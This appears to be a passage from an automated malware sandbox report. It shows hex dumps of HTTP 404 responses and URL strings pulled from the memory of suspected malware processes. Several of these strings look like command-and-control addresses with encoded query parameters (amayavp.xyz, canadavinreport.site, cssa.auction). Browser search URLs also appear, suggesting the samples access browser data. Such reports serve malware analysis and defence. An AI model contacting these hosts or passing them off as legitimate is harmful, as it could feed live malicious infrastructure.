2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:45:53 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:45:55 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:45:58 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 25 Nov 2024 08:46:01 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                      Source: openfiles.exe, 00000007.00000002.4125167672.0000000005B1E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://pip1-loh.com/
                      Source: IETC-24017.exe, 00000000.00000002.1683716815.0000000002746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: IETC-24017.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005DD6000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.00000000054D6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/572a/?ifzt=hz/gBsBCliEB3liRCjDcUFpXpjm75vqUHY7uUC9CoicjvHiRwDII6Rr7fwqPQOBPL5
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006BF8000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.00000000062F8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4130326224.0000000007D05000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cssa.auction
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4130326224.0000000007D05000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cssa.auction/omhm/
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: IETC-24017.exe, 00000000.00000002.1690156355.0000000005190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmtK
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: openfiles.exe, 00000007.00000002.4125167672.000000000598C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: IETC-24017.exe, 00000000.00000002.1690231019.00000000051D0000.00000004.00000020.00020000.00000000.sdmp, IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4126711874.0000000007630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
